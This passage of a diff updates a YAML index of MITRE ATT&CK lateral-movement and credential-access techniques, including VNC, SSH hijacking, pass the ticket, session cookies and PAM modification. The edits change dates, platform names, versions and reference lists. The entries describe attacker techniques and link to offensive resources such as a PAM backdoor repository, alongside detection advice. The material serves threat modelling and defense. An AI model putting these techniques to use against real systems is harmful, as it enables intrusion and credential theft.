-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -42097,11 +42785,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -42124,9 +42812,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -42177,7 +42864,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -42241,7 +42927,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -42312,7 +42997,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -42349,7 +43033,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -42380,8 +43064,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -42464,12 +43146,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -42496,6 +43177,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42513,12 +43195,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -42544,14 +43226,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -42669,7 +43350,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -42723,11 +43403,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42779,14 +43458,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42872,12 +43550,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42897,6 +43574,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42904,7 +43582,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42920,39 +43597,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42977,12 +43655,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42996,13 +43673,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -43019,7 +43695,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -43067,7 +43743,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -43100,7 +43776,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -43139,7 +43814,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -43173,12 +43848,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43206,10 +43879,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -43239,7 +43911,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -43301,12 +43972,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43330,11 +44000,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -43359,9 +44028,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -43421,7 +44089,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -43476,7 +44143,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -43544,12 +44210,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -43606,6 +44271,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43616,13 +44282,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -43681,7 +44346,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43775,49 +44439,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43832,20 +44457,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
